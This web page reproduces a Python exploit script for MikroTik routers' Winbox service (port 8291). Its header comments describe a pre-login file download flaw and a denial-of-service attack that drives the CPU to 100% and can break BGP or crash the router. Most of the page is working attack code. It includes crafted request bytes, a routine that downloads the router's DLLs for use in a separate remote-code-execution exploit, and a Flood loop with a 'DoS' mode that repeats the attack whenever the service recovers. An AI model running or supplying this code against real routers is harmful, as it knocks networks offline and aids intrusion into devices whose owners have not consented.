扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 |
#!/usr/bin/python # Exploit Title: Mikrotik Router Remote Denial Of Service attack # Date: 19/4/2012 # Author: PoURaN @ 133tsec.com # Software Link: http://www.mikrotik.com # Version: All mikrotik routers with winbox service enabled are affected (still a 0day 30/5/2012) # Tested on: Mikrotis RouterOS 2.9.6 up to 5.15 # #Vulnerability Description # =========================== # DETAILS & PoC VIDEO : http://www.133tsec.com/2012/04/30/0day-ddos-mikrotik-server-side-ddos-attack/ # The denial of service, happens on mikrotik router's winbox service when # the attacker is requesting continuesly a part of a .dll/plugin file, so the service # becomes unstable causing every remote clients (with winbox) to disconnect # and denies to accept any further connections. That happens for about 5 minutes. After # the 5 minutes, winbox is stable again, being able to accept new connections. # If you send the malicious packet in a loop (requestingpart of a file right after # the service becoming available again) then you result in a 100% denial of winbox service. # While the winbox service is unstable and in a denial to serve state, it raises router's CPU 100% # and other actions. The "other actions" depends on the router version and on the hardware. # For example on Mikrotik Router v3.30 there was a LAN corruption, BGP fail, whole router failure # => Mikrotik Router v2.9.6 there was a BGP failure # => Mikrotik Router v4.13 unstable wifi links # => Mikrotik Router v5.14/5.15 rarely stacking # =>>> Behaviour may vary most times, but ALL will have CPU 100% . Most routers loose BGP after long time attack <<<= # # #The exploit # ============= # This is a vulnerability in winbox service, exploiting the fact that winbox lets you download files/plugins # that winbox client needs to control the server, and generally lets you gain basic infos about the service BEFORE # user login! # Sending requests specially crafted for the winbox service, can cause a 100% denial of winbox service (router side). # This script, offers you the possibility to download any of the dlls that can be downloaded from the router one-by-one # or alltogether! (look usage for more info) .. The file must be contained in the router's dll index. # The dlls downloaded, are in the format of the winbox service.. Meaning that they are compressed with gzip and they # have 0xFFFF bytes every 0x101 bytes (the format that winbox client is expecting the files) # These DLLs can be used by the "Winbox remote code execution" exploit script ;) # #Usage # ======= # Use the script as described below: # 1. You can download ALL the files of the router's dll index using the following command: # python mkDl.py 10.0.0.1 * 1 # the "1" in the end, is the speed.. "Speed" is a factor I added, so the script delays a bit while receiving # information from the server. It is a MUST for remote routers when they are in long distance (many hops) to use # a slower speed ( 9 for example ). # Also in the beginning of the dlls file list, script shows you the router's version (provided by router's index) # 2. You can download a specific .dll file from the remote router. # python mkDl.py 10.67.162.1 roteros.dll 1 # In this example i download roteros.dll (which is the biggest and main plugin) with a speed factor of 1 (very fast) # Because roteros and 1-2 other files are big, you have to request them in different part (parts of 64k each) # That is a restriction of winbox communication protocol. # If you don't know which file to request, make a "*" request first (1st usage example), see the dlls list, and press ctrl-c # to stop the script. # 3. You can cause a Denial Of Service to the remote router.. Means denial in winbox service or more (read above for more) # python mkDl.py 10.67.162.1 DoS # This command starts requesting from router's winbox service the 1st part of roteros.dll looping the request # and causing DoS to the router. The script is requesting the file till the router stops responding to the port (8291) # Then it waits till the service is up again (using some exception handling), then it requests again till the remote # service is down again etc etc... The requests lasts for about 2 seconds, and the router is not responding for about # 5 minutes as far as i have seen from my tests in different routeros versions. # # <> Greetz to mbarb, dennis, andreas, awmn and all mighty researchers out there! keep walking guys <> # import socket, sys, os, struct, random, time def InitConnection(mikrotikIP, speed): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((mikrotikIP, 8291)) s.send(winboxStartingIndex) data = s.recv(1024) # receiving dll index from server time.sleep(0.001*speed) if data.find("\xFF\x02"+"index"+"\x00") > -1: print "[+] Index received!" else: print "[+] Wrong index.. Exiting.." sys.exit(0) return s def download(filename, speed, s): f = open(filename, 'wb') if len(filename) < 13 and len(filename) > 6: print "[+] Requesting file ", filename, ' <->' winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter s.send(winboxStartingFileReq) time.sleep(0.001*speed) dataReceived = s.recv(1) if dataReceived[0:1]=='\xFF': print "[+] Receiving the file..." f.write(dataReceived) # written 1st byte time.sleep(0.001*speed) dataReceived = s.recv(0x101) # 0x100 + 1 nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0] if dataReceived[0:1]=='\x02': time.sleep(0.001*speed) f.write(dataReceived) # written 1st chunk 0x102 bytes with header in file. dataReceived = s.recv(0x102) # 1st sequence of (0xFF 0xFF) bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2 f.write(dataReceived) # write the next 0x102 bytes (total 0x102+0x102 in file) else: print "[-] Wrong data received..(2)" sys.exit(0) else: print "[-] Wrong data received..(1)" sys.exit(0) finalPart=0 bigFileCounter = 0xFFED packetsCounted=0 # counter for the 0x101 packet counts. Every time a file is requested this counter is 0 fileRequested=0 # every time a file needs to be requested more than 1 time, this is it's counter. while 1: # header of file done.. Now LOOP the body.. packetsCounted+=1 # dbg time.sleep(0.001*speed) dataReceived = s.recv(bytesToRead) f.write(dataReceived) if (bytesToRead <> len(dataReceived)) and packetsCounted==255: # an den diavazei osa bytesToRead prepei, simainei oti eftase sto telos i lipsi tou part pou katevazoume packetsCounted = -1 print '[+] Next file part : ', fileRequested s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) + struct.pack('>h',bigFileCounter)) time.sleep(0.001*speed) dataReceived = s.recv(0x101 + 2) # Reads the new header of the new part!!! nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0] f.write(dataReceived) bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) fileRequested += 1 bigFileCounter -= 0x13 bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) # den prostheto 2 tora giati to teleutaio den einai ff.. einai akrivos to size pou paramenei.. if bytesToRead==0xFF: # kalipto tin periptosi opou to teleutaio struct den einai ff alla exei to size pou apomenei bytesToRead += 2 if bytesToRead != 0x101 and nextPartFingerprint < 65517: # dikaiologountai ta liga bytes otan teleiose ena apo ta parts tou file time.sleep(0.001*speed) dataReceived = s.recv(bytesToRead) f.write(dataReceived) break if bytesToRead != 0x101 and nextPartFingerprint==65517: # ligotera bytes KAI fingerprint 65517 simainei corrupted file.. print '[-] File download terminated abnormaly.. please try again probably with a slower speed..' sys.exit(0) if fileRequested < 1: print '[+] File was small and was downloaded in one part\n[+] Downloaded successfully' else: print '[+] File '+filename+' downloaded successfully' f.close() s.close() def Flood(s): filename = 'roteros.dll' f = 'we\'r not gonna use I/O to store the data' print "[+] Requesting file ", filename, ' till death :)' time.sleep(1) winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter s.send(winboxStartingFileReq) time.sleep(0.001) dataReceived = s.recv(1) if dataReceived[0:1]=='\xFF': f = dataReceived # written 1st byte time.sleep(0.001) dataReceived = s.recv(0x101) # 0x100 + 1 nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0] if dataReceived[0:1]=='\x02': time.sleep(0.001) f = dataReceived # written 1st chunk 0x102 bytes with header in file. dataReceived = s.recv(0x102) # 1st sequence of (0xFF 0xFF) bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2 f = dataReceived # write the next 0x102 bytes (total 0x102+0x102 in file) else: print "[-] Wrong data received..(2)" sys.exit(0) else: print "[-] Wrong data received..(1)" sys.exit(0) finalPart=0 bigFileCounter = 0xFFED packetsCounted=0 # counter for the 0x101 packet counts. Every time a file is requested this counter is 0 fileRequested=0 # every time a file needs to be requested more than 1 time, this is it's counter. try: while 1: s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) + struct.pack('>h',bigFileCounter)) s.recv(1) print '- Sending evil packet.. press CTRL-C to stop -' except: print 'Connection reseted by server.. trying attacking again' ############################################################################################################### ########################################### SCRIPT BODY STARTS HERE ########################################### global RequestHeader RequestHeader = ('\x12\x02') global RequestFirstFooter RequestFirstFooter = ('\xFF\xED\x00\x00\x00\x00') global winboxStartingIndex winboxStartingIndex=(RequestHeader + 'index' + '\x00'*7 + RequestFirstFooter) winboxStartingFileReq=(RequestHeader + '\x00'*12 + RequestFirstFooter) print '\n[Winbox plugin downloader]\n\n' if len(sys.argv)==3: if sys.argv[2]=='DoS': # if i combine both checks in 1st if, there will be error.. guess why.. ;) print '[+] Hmmm we gonna attack it..' time.sleep(1) speed=1 mikrotikIP = sys.argv[1] filename = sys.argv[2] while 1: time.sleep(1) try: s = InitConnection(mikrotikIP, speed) Flood(s) except: time.sleep(1) if len(sys.argv)<>4: print 'Usage : '+sys.argv[0]+' <mikrotik_ip> <filename_to_download> <speed>\n\t<speed>:\t [from 0 to 9] 1=faster, 9=slower but more reliable\n' sys.exit(0) mikrotikIP = sys.argv[1] filename = sys.argv[2] speed = int(sys.argv[3]) if speed>9 or speed<1: print 'Speed must be between 1 and 9 else there are unexpected results!' sys.exit(0) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((mikrotikIP, 8291)) s.send(winboxStartingIndex) data = s.recv(1024) # receiving dll index from server s.close() if filename.find('*') > -1: DllList = data.split('\x0a') print 'Mikrotik\'s version is '+DllList[1].split(' ')[3]+'\nThe following Dlls gonna be requested :' for i in range(0, len(DllList)-1): print DllList[i].split(' ')[2] raw_input('> Press enter to continue <') for extractedDlls in range(0, len(DllList)-1): print "[+] Requesting ", DllList[extractedDlls].split(' ')[2] filename=DllList[extractedDlls].split(' ')[2] s = InitConnection(mikrotikIP, speed) download(filename, speed, s) else: s = InitConnection(mikrotikIP, speed) download(filename, speed, s) |
体验盒子
